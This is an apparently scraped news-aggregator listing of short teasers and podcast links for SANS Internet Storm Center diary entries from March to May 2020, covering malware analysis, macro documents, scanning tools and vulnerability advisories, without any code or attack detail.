Read the original article: Excel 4 Macro Analysis: XLMMacroDeobfuscator, (Mon, May 11th) Malicious Excel 4 macro documents become more prevalent. They are so obfuscated now, that analysis requires calculations of many formulas. Advertise on IT Security News. Read the…
Tag: SANS Internet Storm Center, InfoCON: green
ISC Stormcast For Monday, May 11th 2020 https://isc.sans.edu/podcastdetail.html?id=6990, (Mon, May 11th)
Read the original article: ISC Stormcast For Monday, May 11th 2020 https://isc.sans.edu/podcastdetail.html?id=6990, (Mon, May 11th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Monday, May 11th 2020 https://isc.sans.edu/podcastdetail.html?id=6990,…
YARA v4.0.0: BASE64 Strings, (Sun, May 10th)
Read the original article: YARA v4.0.0: BASE64 Strings, (Sun, May 10th) YARA version 4.0.0 was released. Advertise on IT Security News. Read the original article: YARA v4.0.0: BASE64 Strings, (Sun, May 10th)
Nmap Basics – The Security Practitioner’s Swiss Army Knife, (Sat, May 9th)
Read the original article: Nmap Basics – The Security Practitioner’s Swiss Army Knife, (Sat, May 9th) To elaborate on Xavier's and Bojan's excellent nmap diaries over the last few days, I thought that today might be a good day to…
VMWare vRealize Critical vulnerabilities due to SaltStack – VMSA-2020-0009, (Sat, May 9th)
Read the original article: VMWare vRealize Critical vulnerabilities due to SaltStack – VMSA-2020-0009, (Sat, May 9th) VMWare has announced two vulnerabiliities in their vRealize product related to their integration of the popular open source server management software SaltStack, for which…
Using Nmap As a Lightweight Vulnerability Scanner, (Fri, May 8th)
Read the original article: Using Nmap As a Lightweight Vulnerability Scanner, (Fri, May 8th) Yesterday, Bojan wrote a nice diary[1] about the power of the Nmap scripting language (based on LUA). The well-known port scanner can be extended with plenty…
ISC Stormcast For Friday, May 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6988, (Fri, May 8th)
Read the original article: ISC Stormcast For Friday, May 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6988, (Fri, May 8th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Friday, May 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6988,…
Scanning with nmap?s NSE scripts, (Thu, May 7th)
Read the original article: Scanning with nmap?s NSE scripts, (Thu, May 7th) If someone asked me 7 or 8 years ago what I use nmap for, my answer would be: simple port scanning â it's a port scanner, and that's…
ISC Stormcast For Thursday, May 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6986, (Thu, May 7th)
Read the original article: ISC Stormcast For Thursday, May 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6986, (Thu, May 7th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Thursday, May 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6986,…
Keeping an Eye on Malicious Files Life Time, (Wed, May 6th)
Read the original article: Keeping an Eye on Malicious Files Life Time, (Wed, May 6th) We know that today's malware campaigns are based on fresh files. Each piece of malware has a unique hash and it makes the detection based…
ISC Stormcast For Wednesday, May 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6984, (Wed, May 6th)
Read the original article: ISC Stormcast For Wednesday, May 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6984, (Wed, May 6th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Wednesday, May 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6984,…
ISC Stormcast For Tuesday, May 5th 2020 https://isc.sans.edu/podcastdetail.html?id=6982, (Tue, May 5th)
Read the original article: ISC Stormcast For Tuesday, May 5th 2020 https://isc.sans.edu/podcastdetail.html?id=6982, (Tue, May 5th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Tuesday, May 5th 2020 https://isc.sans.edu/podcastdetail.html?id=6982,…
Cloud Security Features Don’t Replace the Need for Personnel Security Capabilities, (Tue, May 5th)
Read the original article: Cloud Security Features Don’t Replace the Need for Personnel Security Capabilities, (Tue, May 5th) We received excellent comments and a question regarding cloud security features from an ISC reader today that we thought was important to…
Sysmon and File Deletion, (Mon, May 4th)
Read the original article: Sysmon and File Deletion, (Mon, May 4th) A new version of Sysmon was released, with a new major feature: detection of file deletion (with deleted file preservation). Advertise on IT Security News. Read the original…

ZIP & AES, (Sun, May 3rd)
Read the original article: 
ZIP & AES, (Sun, May 3rd) A comment on my diary entry “MALWARE Bazaar” mentioned problems with the ZIP password of downloaded samples (MALWARE Bazaar is a free service were you can download malware samples). …
ISC Stormcast For Monday, May 4th 2020 https://isc.sans.edu/podcastdetail.html?id=6980, (Mon, May 4th)
Read the original article: ISC Stormcast For Monday, May 4th 2020 https://isc.sans.edu/podcastdetail.html?id=6980, (Mon, May 4th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Monday, May 4th 2020 https://isc.sans.edu/podcastdetail.html?id=6980,…
ZIP & AES, (Sun, May 3rd)
Read the original article: ZIP & AES, (Sun, May 3rd) A comment on my diary entry “MALWARE Bazaar” mentioned problems with the ZIP password of downloaded samples (MALWARE Bazaar is a free service were you can download malware samples). …
Phishing PDF with Unusual Hostname, (Sat, May 2nd)
Read the original article: Phishing PDF with Unusual Hostname, (Sat, May 2nd) Taking a look with pdfid.py at a PDF received 2 days ago to update Amazon Prime account information: Advertise on IT Security News. Read the original article:…
ISC Stormcast For Friday, May 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6978, (Fri, May 1st)
Read the original article: ISC Stormcast For Friday, May 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6978, (Fri, May 1st) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Friday, May 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6978,…
Attack traffic on TCP port 9673, (Fri, May 1st)
Read the original article: Attack traffic on TCP port 9673, (Fri, May 1st) I don't know how many of you pay attention to the Top 10 Ports graphs on your isc.sans.edu dashboard, but I do. Unfortunately, the top 10 is…
Collecting IOCs from IMAP Folder, (Thu, Apr 30th)
Read the original article: Collecting IOCs from IMAP Folder, (Thu, Apr 30th) I've plenty of subscriptions to “cyber security” mailing lists that generate a lot of traffic. Even if we try to get rid of emails, that's a fact: email…
ISC Stormcast For Thursday, April 30th 2020 https://isc.sans.edu/podcastdetail.html?id=6976, (Thu, Apr 30th)
Read the original article: ISC Stormcast For Thursday, April 30th 2020 https://isc.sans.edu/podcastdetail.html?id=6976, (Thu, Apr 30th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Thursday, April 30th 2020 https://isc.sans.edu/podcastdetail.html?id=6976,…
Privacy Preserving Protocols to Trace Covid19 Exposure, (Wed, Apr 29th)
Read the original article: Privacy Preserving Protocols to Trace Covid19 Exposure, (Wed, Apr 29th) In recent weeks, you probably heard a lot about the “Covid19 Tracing Apps” that Google, Apple, and others. These news reports usually mention the privacy aspects…
ISC Stormcast For Wednesday, April 29th 2020 https://isc.sans.edu/podcastdetail.html?id=6974, (Wed, Apr 29th)
Read the original article: ISC Stormcast For Wednesday, April 29th 2020 https://isc.sans.edu/podcastdetail.html?id=6974, (Wed, Apr 29th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Wednesday, April 29th 2020 https://isc.sans.edu/podcastdetail.html?id=6974,…
Agent Tesla delivered by the same phishing campaign for over a year, (Tue, Apr 28th)
Read the original article: Agent Tesla delivered by the same phishing campaign for over a year, (Tue, Apr 28th) While going over malicious e-mails caught by our company gateway in March, I noticed that several of those, that carried ACE…
ISC Stormcast For Tuesday, April 28th 2020 https://isc.sans.edu/podcastdetail.html?id=6972, (Tue, Apr 28th)
Read the original article: ISC Stormcast For Tuesday, April 28th 2020 https://isc.sans.edu/podcastdetail.html?id=6972, (Tue, Apr 28th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Tuesday, April 28th 2020 https://isc.sans.edu/podcastdetail.html?id=6972,…
Powershell Payload Stored in a PSCredential Object, (Mon, Apr 27th)
Read the original article: Powershell Payload Stored in a PSCredential Object, (Mon, Apr 27th) An interesting obfuscation technique to store a malicious payload in a PowerShell script: In a PSCredential object! Advertise on IT Security News. Read the original…
ISC Stormcast For Monday, April 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6970, (Mon, Apr 27th)
Read the original article: ISC Stormcast For Monday, April 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6970, (Mon, Apr 27th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Monday, April 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6970,…
Video: Malformed .docm File, (Sun, Apr 26th)
Read the original article: Video: Malformed .docm File, (Sun, Apr 26th) In diary entry “Obfuscated with a Simple 0x0A”, Xavier discovers that a .docm file is a malformed ZIP file. Advertise on IT Security News. Read the original article:…
MALWARE Bazaar, (Sat, Apr 25th)
Read the original article: MALWARE Bazaar, (Sat, Apr 25th) When we publish diary entries covering malware, we almost always share the hash of the malware sample. Advertise on IT Security News. Read the original article: MALWARE Bazaar, (Sat, Apr…
ISC Stormcast For Friday, April 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6968, (Fri, Apr 24th)
Read the original article: ISC Stormcast For Friday, April 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6968, (Fri, Apr 24th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Friday, April 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6968,…
Malicious Excel With a Strong Obfuscation and Sandbox Evasion, (Fri, Apr 24th)
Read the original article: Malicious Excel With a Strong Obfuscation and Sandbox Evasion, (Fri, Apr 24th) For a few weeks, we see a bunch of Excel documents spread in the wild with Macro V4[1]. But VBA macros remain a classic…
ISC Stormcast For Thursday, April 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6966, (Thu, Apr 23rd)
Read the original article: ISC Stormcast For Thursday, April 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6966, (Thu, Apr 23rd) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Thursday, April 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6966,…
ISC Stormcast For Wednesday, April 22nd 2020 https://isc.sans.edu/podcastdetail.html?id=6964, (Wed, Apr 22nd)
Read the original article: ISC Stormcast For Wednesday, April 22nd 2020 https://isc.sans.edu/podcastdetail.html?id=6964, (Wed, Apr 22nd) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Wednesday, April 22nd 2020 https://isc.sans.edu/podcastdetail.html?id=6964,…
ISC Stormcast For Tuesday, April 21st 2020 https://isc.sans.edu/podcastdetail.html?id=6962, (Tue, Apr 21st)
Read the original article: ISC Stormcast For Tuesday, April 21st 2020 https://isc.sans.edu/podcastdetail.html?id=6962, (Tue, Apr 21st) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Tuesday, April 21st 2020 https://isc.sans.edu/podcastdetail.html?id=6962,…
SpectX: Log Parser for DFIR, (Tue, Apr 21st)
Read the original article: SpectX: Log Parser for DFIR, (Tue, Apr 21st) I hope this finds you all safe, healthy, and sheltered to the best of your ability. Advertise on IT Security News. Read the original article: SpectX: Log…
KPOT AutoIt Script: Analysis, (Mon, Apr 20th)
Read the original article: KPOT AutoIt Script: Analysis, (Mon, Apr 20th) In diary entry “KPOT Deployed via AutoIt Script” I obtained 3 files: Advertise on IT Security News. Read the original article: KPOT AutoIt Script: Analysis, (Mon, Apr 20th)
ISC Stormcast For Monday, April 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6960, (Mon, Apr 20th)
Read the original article: ISC Stormcast For Monday, April 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6960, (Mon, Apr 20th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Monday, April 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6960,…
KPOT Analysis: Obtaining the Decrypted KPOT EXE, (Sun, Apr 19th)
Read the original article: KPOT Analysis: Obtaining the Decrypted KPOT EXE, (Sun, Apr 19th) In diary entry “KPOT Deployed via AutoIt Script” I obtained 3 files: Advertise on IT Security News. Read the original article: KPOT Analysis: Obtaining the…

Weaponized RTF Document Generator & Mailer in PowerShell, (Fri, Apr 17th)
Read the original article: 
Weaponized RTF Document Generator & Mailer in PowerShell, (Fri, Apr 17th) Another piece of malicious PowerShell script that I found while hunting. Like many malicious activities that occur in those days, it is related to the…
Maldoc Falsely Represented as DOCX Invoice Redirecting to Fake Apple Store, (Sat, Apr 18th)
Read the original article: Maldoc Falsely Represented as DOCX Invoice Redirecting to Fake Apple Store, (Sat, Apr 18th) This is a phishing document received today pretending to be an invoice (Word Document) from Apple Support but initial analysis shows it…
Weaponized RTF Document Generator & Mailer in PowerShell, (Fri, Apr 17th)
Read the original article: Weaponized RTF Document Generator & Mailer in PowerShell, (Fri, Apr 17th) Another piece of malicious PowerShell script that I found while hunting. Like many malicious activities that occur in those days, it is related to the…
ISC Stormcast For Friday, April 17th 2020 https://isc.sans.edu/podcastdetail.html?id=6958, (Fri, Apr 17th)
Read the original article: ISC Stormcast For Friday, April 17th 2020 https://isc.sans.edu/podcastdetail.html?id=6958, (Fri, Apr 17th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Friday, April 17th 2020 https://isc.sans.edu/podcastdetail.html?id=6958,…
Using AppLocker to Prevent Living off the Land Attacks, (Thu, Apr 16th)
Read the original article: Using AppLocker to Prevent Living off the Land Attacks, (Thu, Apr 16th) STI student David Brown published an STI research paper in January with some interesting ideas to prevent living off the land attacks with AppLocker.…
ISC Stormcast For Thursday, April 16th 2020 https://isc.sans.edu/podcastdetail.html?id=6956, (Thu, Apr 16th)
Read the original article: ISC Stormcast For Thursday, April 16th 2020 https://isc.sans.edu/podcastdetail.html?id=6956, (Thu, Apr 16th) This post doesn’t have text content, please click on the link below to view the original article. ISC Stormcast For Thursday, April 16th 2020 https://isc.sans.edu/podcastdetail.html?id=6956,…
No IOCs? No Problem! Getting a Start Hunting for Malicious Office Files, (Wed, Apr 15th)
Read the complete article: b’No IOCs? No Problem! Getting a Start Hunting for Malicious Office Files, (Wed, Apr 15th)’ This post doesn’t have text content, please click on the link below to view the original article. Advertise on IT…
ISC Stormcast For Wednesday, April 15th 2020 https://isc.sans.edu/podcastdetail.html?id=6954, (Wed, Apr 15th)
ISC Stormcast For Wednesday, April 15th 2020 https://isc.sans.edu/podcastdetail.html?id=6954, (Wed, Apr 15th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Wednesday, April 15th 2020 https://isc.sans.edu/podcastdetail.html?id=6954, (Wed, Apr 15th)
Microsoft April 2020 Patch Tuesday, (Tue, Apr 14th)
This month we got patches for 113 vulnerabilities total. According to Microsoft, three of them are being exploited (CVE-2020-1020, CVE-2020-0938 and CVE-2020-0968) and two were previously disclosed (CVE-2020-1020 and CVE-2020-0935). Advertise on IT Security News. Read the complete article:…
ISC Stormcast For Tuesday, April 14th 2020 https://isc.sans.edu/podcastdetail.html?id=6952, (Tue, Apr 14th)
ISC Stormcast For Tuesday, April 14th 2020 https://isc.sans.edu/podcastdetail.html?id=6952, (Tue, Apr 14th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Tuesday, April 14th 2020 https://isc.sans.edu/podcastdetail.html?id=6952, (Tue, Apr 14th)
Look at the same phishing campaign 3 months apart, (Mon, Apr 13th)
While going through a batch of malicious e-mails, which were caught by my mail filters in March, I noticed a simple phishing e-mail, which carried an entire credential-stealing page in its attachment. This, although interesting in its own way, would…
ISC Stormcast For Monday, April 13th 2020 https://isc.sans.edu/podcastdetail.html?id=6950, (Mon, Apr 13th)
ISC Stormcast For Monday, April 13th 2020 https://isc.sans.edu/podcastdetail.html?id=6950, (Mon, Apr 13th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Monday, April 13th 2020 https://isc.sans.edu/podcastdetail.html?id=6950, (Mon, Apr 13th)
Reader Analysis: “Dynamic analysis technique to get decrypted KPOT Malware.”, (Sun, Apr 12th)
Reader Vinnie shared his analysis of KPOT malware with us: Advertise on IT Security News. Read the complete article: Reader Analysis: “Dynamic analysis technique to get decrypted KPOT Malware.”, (Sun, Apr 12th)
Wireshark 3.2.3 Released: Mac Users Pay Attention Please, (Sat, Apr 11th)
Wireshark version 3.2.3 was released. Advertise on IT Security News. Read the complete article: Wireshark 3.2.3 Released: Mac Users Pay Attention Please, (Sat, Apr 11th)
Critical Vuln in vCenter vmdir (CVE-2020-3952), (Fri, Apr 10th)
On April 9, VMware published VMSA-2020-0006, a security advisory for a critical vulnerability in vCenter Server that received the maximum CVSSv3 score of 10.0. The vulnerablity, %%cve:2020-3952%% , involves a sensitive information disclosure flaw in the VMware Directory Service (vmdir)…
PowerShell Sample Extracting Payload From SSL, (Fri, Apr 10th)
Another diary, another technique to fetch a malicious payload and execute it on the victim host. I spotted this piece of Powershell code this morning while reviewing my hunting results. It implements a very interesting technique. As usual, all the…
ISC Stormcast For Friday, April 10th 2020 https://isc.sans.edu/podcastdetail.html?id=6948, (Fri, Apr 10th)
ISC Stormcast For Friday, April 10th 2020 https://isc.sans.edu/podcastdetail.html?id=6948, (Fri, Apr 10th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Friday, April 10th 2020 https://isc.sans.edu/podcastdetail.html?id=6948, (Fri, Apr 10th)
Performing deception to OS Fingerprint (Part 1: nmap), (Sat, Mar 28th)
How can you know which operating system is running on a specific remote host? The technique to answer this question corresponds to the fingerprinting of the operating system and is executed by sending a specific set of packages to the…
ISC Stormcast For Thursday, April 9th 2020 https://isc.sans.edu/podcastdetail.html?id=6946, (Thu, Apr 9th)
ISC Stormcast For Thursday, April 9th 2020 https://isc.sans.edu/podcastdetail.html?id=6946, (Thu, Apr 9th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Thursday, April 9th 2020 https://isc.sans.edu/podcastdetail.html?id=6946, (Thu, Apr 9th)
ISC Stormcast For Wednesday, April 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6944, (Wed, Apr 8th)
ISC Stormcast For Wednesday, April 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6944, (Wed, Apr 8th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Wednesday, April 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6944, (Wed, Apr 8th)
German malspam pushes ZLoader malware, (Wed, Apr 8th)
Introduction Advertise on IT Security News. Read the complete article: German malspam pushes ZLoader malware, (Wed, Apr 8th)
Increase in RDP Scanning, (Tue, Apr 7th)
Increase in RDP Scanning, (Tue, Apr 7th) Advertise on IT Security News. Read the complete article: Increase in RDP Scanning, (Tue, Apr 7th)
ISC Stormcast For Tuesday, April 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6942, (Tue, Apr 7th)
ISC Stormcast For Tuesday, April 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6942, (Tue, Apr 7th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Tuesday, April 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6942, (Tue, Apr 7th)
Password Protected Malicious Excel Files, (Mon, Apr 6th)
We've been seeing quite some malicious Excel files with Excel 4 macros lately. Advertise on IT Security News. Read the complete article: Password Protected Malicious Excel Files, (Mon, Apr 6th)
ISC Stormcast For Monday, April 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6940, (Mon, Apr 6th)
ISC Stormcast For Monday, April 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6940, (Mon, Apr 6th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Monday, April 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6940, (Mon, Apr 6th)
Maldoc XLS Invoice with Excel 4 Macros, (Sun, Apr 5th)
This week I got an email claiming to be a YellowPages invoice with an XLS attachment containing an Excel 4.0 macro which has similarity to [1][2]. Advertise on IT Security News. Read the complete article: Maldoc XLS Invoice with…
New Bypass Technique or Corrupt Word Document?, (Sat, Apr 4th)
I was taking a closer look at Xavier's Word document he analyzed in yesterday's diary entry: “Obfuscated with a Simple 0x0A”. Advertise on IT Security News. Read the complete article: New Bypass Technique or Corrupt Word Document?, (Sat, Apr…
Obfuscated with a Simple 0x0A, (Fri, Apr 3rd)
With the current Coronavirus pandemic, we continue to see more and more malicious activity around this topic. Today, we got a report from a reader who found a nice malicious Word document part of a Coronavirus phishing campaign. I don't know…
ISC Stormcast For Friday, April 3rd 2020 https://isc.sans.edu/podcastdetail.html?id=6938, (Fri, Apr 3rd)
ISC Stormcast For Friday, April 3rd 2020 https://isc.sans.edu/podcastdetail.html?id=6938, (Fri, Apr 3rd) Advertise on IT Security News. Read the complete article: ISC Stormcast For Friday, April 3rd 2020 https://isc.sans.edu/podcastdetail.html?id=6938, (Fri, Apr 3rd)
ISC Stormcast For Thursday, April 2nd 2020 https://isc.sans.edu/podcastdetail.html?id=6936, (Thu, Apr 2nd)
ISC Stormcast For Thursday, April 2nd 2020 https://isc.sans.edu/podcastdetail.html?id=6936, (Thu, Apr 2nd) Advertise on IT Security News. Read the complete article: ISC Stormcast For Thursday, April 2nd 2020 https://isc.sans.edu/podcastdetail.html?id=6936, (Thu, Apr 2nd)
TPOT’s Cowrie to ISC Logs, (Thu, Apr 2nd)
TPOT’s Cowrie to ISC Logs, (Thu, Apr 2nd) Advertise on IT Security News. Read the complete article: TPOT’s Cowrie to ISC Logs, (Thu, Apr 2nd)
ISC Stormcast For Wednesday, April 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6934, (Wed, Apr 1st)
ISC Stormcast For Wednesday, April 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6934, (Wed, Apr 1st) Advertise on IT Security News. Read the complete article: ISC Stormcast For Wednesday, April 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6934, (Wed, Apr 1st)
Qakbot malspam sent from an infected Windows host, (Wed, Apr 1st)
Introduction Advertise on IT Security News. Read the complete article: Qakbot malspam sent from an infected Windows host, (Wed, Apr 1st)
ISC Stormcast For Tuesday, March 31st 2020 https://isc.sans.edu/podcastdetail.html?id=6932, (Tue, Mar 31st)
ISC Stormcast For Tuesday, March 31st 2020 https://isc.sans.edu/podcastdetail.html?id=6932, (Tue, Mar 31st) Advertise on IT Security News. Read the complete article: ISC Stormcast For Tuesday, March 31st 2020 https://isc.sans.edu/podcastdetail.html?id=6932, (Tue, Mar 31st)
Kwampirs Targeted Attacks Involving Healthcare Sector, (Tue, Mar 31st)
There is no honor among thieves. Even after some ransomware gangs claimed to seize targeting the healthcare sector, attacks continue to happen. But ransomware isn't alone. Last week, the FBI updated an advisory regarding the Kwampirs malware, pointing out the…
Crashing explorer.exe with(out) a click, (Mon, Mar 30th)
In a couple of my recent diaries, we discussed two small unpatched vulnerabilities/weaknesses in Windows. One, which allowed us to brute-force contents of folders without any permissions[1], and another, which enabled us to change names of files and folders without…
Obfuscated Excel 4 Macros, (Sun, Mar 29th)
2 readers (anonymous and Robert) submitted very similar malicious spreadsheets with almost no detections on VT: c1394e8743f0d8e59a4c7123e6cd5298 and a03ae50077bf6fad3b562241444481c1. Advertise on IT Security News. Read the complete article: Obfuscated Excel 4 Macros, (Sun, Mar 29th)
Covid19 Domain Classifier, (Sat, Mar 28th)
Johannes started a Covid19 Domain Classifier here on our Internet Storm Center site. Advertise on IT Security News. Read the complete article: Covid19 Domain Classifier, (Sat, Mar 28th)
Help us classify Covid19 related domains https://isc.sans.edu/covidclassifier.html (login required), (Fri, Mar 27th)
— Advertise on IT Security News. Read the complete article: Help us classify Covid19 related domains https://isc.sans.edu/covidclassifier.html (login required), (Fri, Mar 27th)
Malicious JavaScript Dropping Payload in the Registry, (Fri, Mar 27th)
When we speak about “fileless” malware, it means that the malware does not use the standard filesystem to store temporary files or payloads. But they need to write data somewhere in the system for persistence or during the infection phase.…
ISC Stormcast For Friday, March 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6928, (Fri, Mar 27th)
ISC Stormcast For Friday, March 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6928, (Fri, Mar 27th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Friday, March 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6928, (Fri, Mar 27th)
Very Large Sample as Evasion Technique?, (Thu, Mar 26th)
Security controls have a major requirement: they can't (or at least they try to not) interfere with normal operations of the protected system. It is known that antivirus products do not scan very large files (or just the first x…
ISC Stormcast For Thursday, March 26th 2020 https://isc.sans.edu/podcastdetail.html?id=6926, (Thu, Mar 26th)
ISC Stormcast For Thursday, March 26th 2020 https://isc.sans.edu/podcastdetail.html?id=6926, (Thu, Mar 26th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Thursday, March 26th 2020 https://isc.sans.edu/podcastdetail.html?id=6926, (Thu, Mar 26th)
ISC Stormcast For Wednesday, March 25th 2020 https://isc.sans.edu/podcastdetail.html?id=6924, (Wed, Mar 25th)
ISC Stormcast For Wednesday, March 25th 2020 https://isc.sans.edu/podcastdetail.html?id=6924, (Wed, Mar 25th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Wednesday, March 25th 2020 https://isc.sans.edu/podcastdetail.html?id=6924, (Wed, Mar 25th)
Recent Dridex activity, (Wed, Mar 25th)
Introduction Advertise on IT Security News. Read the complete article: Recent Dridex activity, (Wed, Mar 25th)
SANS CyberCast Hallway Talk: Microsoft Windows Type 1 Font Parsing 0-Day https://www.youtube.com/watch?v=VSnVbrgnXJs, (Tue, Mar 24th)
— Advertise on IT Security News. Read the complete article: SANS CyberCast Hallway Talk: Microsoft Windows Type 1 Font Parsing 0-Day https://www.youtube.com/watch?v=VSnVbrgnXJs, (Tue, Mar 24th)
Another Critical COVID-19 Shortage: Digital Security, (Tue, Mar 24th)
Following is a guest cross-post from John Scott-Railton, a Senior Researcher at The Citizen Lab. His work focuses on technological threats to civil society. Advertise on IT Security News. Read the complete article: Another Critical COVID-19 Shortage: Digital Security,…
ISC Stormcast For Tuesday, March 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6922, (Tue, Mar 24th)
ISC Stormcast For Tuesday, March 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6922, (Tue, Mar 24th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Tuesday, March 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6922, (Tue, Mar 24th)
Windows Zeroday Actively Exploited: Type 1 Font Parsing Remote Code Execution Vulnerability, (Mon, Mar 23rd)
Microsoft announced limited exploitation of a zeroday remote code execution vulnerability in the type 1 font parser. Advertise on IT Security News. Read the complete article: Windows Zeroday Actively Exploited: Type 1 Font Parsing Remote Code Execution Vulnerability, (Mon,…
KPOT Deployed via AutoIt Script, (Mon, Mar 23rd)
I have other samples like the malware I covered in yesterday's diary entry. Advertise on IT Security News. Read the complete article: KPOT Deployed via AutoIt Script, (Mon, Mar 23rd)
ISC Stormcast For Monday, March 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6920, (Mon, Mar 23rd)
ISC Stormcast For Monday, March 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6920, (Mon, Mar 23rd) Advertise on IT Security News. Read the complete article: ISC Stormcast For Monday, March 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6920, (Mon, Mar 23rd)
More COVID-19 Themed Malware, (Sun, Mar 22nd)
Reader Andrew received a COVID-19 themed email with malicious attachment, and submitted the complete email. Advertise on IT Security News. Read the complete article: More COVID-19 Themed Malware, (Sun, Mar 22nd)

Honeypot – Scanning and Targeting Devices & Services, (Sat, Mar 21st)
I was curious this week to see if my honeypot traffic would increase since a large portion of the world is working from home. Reviewing my honeypot logs, I decided to check what type of filename was mostly targeted (GET/POST/HEAD)…
Honeypot – Scanning and Targeting Devices & Services, (Sat, Mar 21st)
I was curious this week to see if my honeypot traffic would increase since a large portion of the world is working from home. Reviewing my honeypot logs, I decided to check what type of filename was mostly targeted (GET/POST/HEAD)…
ISC Stormcast For Friday, March 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6918, (Fri, Mar 20th)
ISC Stormcast For Friday, March 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6918, (Fri, Mar 20th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Friday, March 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6918, (Fri, Mar 20th)
COVID-19 Themed Multistage Malware, (Thu, Mar 19th)
More and more countries are closing their borders and ask citizens to stay at home. The COVID-19 virus is everywhere and also used in campaigns to lure more victims who are looking for information about the pandemic. I found a…
ISC Stormcast For Thursday, March 19th 2020 https://isc.sans.edu/podcastdetail.html?id=6916, (Thu, Mar 19th)
ISC Stormcast For Thursday, March 19th 2020 https://isc.sans.edu/podcastdetail.html?id=6916, (Thu, Mar 19th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Thursday, March 19th 2020 https://isc.sans.edu/podcastdetail.html?id=6916, (Thu, Mar 19th)
ISC Stormcast For Wednesday, March 18th 2020 https://isc.sans.edu/podcastdetail.html?id=6914, (Wed, Mar 18th)
ISC Stormcast For Wednesday, March 18th 2020 https://isc.sans.edu/podcastdetail.html?id=6914, (Wed, Mar 18th) Advertise on IT Security News. Read the complete article: ISC Stormcast For Wednesday, March 18th 2020 https://isc.sans.edu/podcastdetail.html?id=6914, (Wed, Mar 18th)
Trickbot gtag red5 distributed as a DLL file, (Wed, Mar 18th)
Introduction Advertise on IT Security News. Read the complete article: Trickbot gtag red5 distributed as a DLL file, (Wed, Mar 18th)
A Quick Summary of Current Reflective DNS DDoS Attacks, (Tue, Mar 17th)
DNS is still a popular protocol to amplify denial of service attacks. A rather small DNS query, sent to an open recursive resolver, can be used to trigger a large response. Over the last few years, DNS servers implemented many…
ISC Stormcast For Tuesday, March 17th 2020 https://isc.sans.edu/podcastdetail.html?id=6912, (Tue, Mar 17th)
